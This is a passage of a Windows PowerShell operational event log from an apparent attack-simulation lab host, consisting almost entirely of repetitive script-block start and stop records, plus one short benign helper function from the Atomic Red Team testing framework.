Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478172
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478171
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478170
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478169
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478168
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478167
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478166
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478165
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478164
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478163
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-PrereqExecutor ($test) {
    if ($nul -eq $test.dependency_executor_name) { $executor = $test.executor.name } 
    else { $executor = $test.dependency_executor_name }
    $executor
}

ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Get-PrereqExecutor.ps1
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478162
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478161
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478160
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478159
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478158
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478157
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478156
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478155
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478154
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478153
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478152
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478151
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478150
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478148
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478147
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478146
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478144
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478143
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478142
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478141
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478140
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478139
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478138
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478137
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478136
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478135
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478134
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478133
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478132
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478131
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478130
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478129
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478128
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478127
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478126
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478125
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478124
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478123
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478122
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478121
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478120
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478119
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478118
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478117
Keywords=None
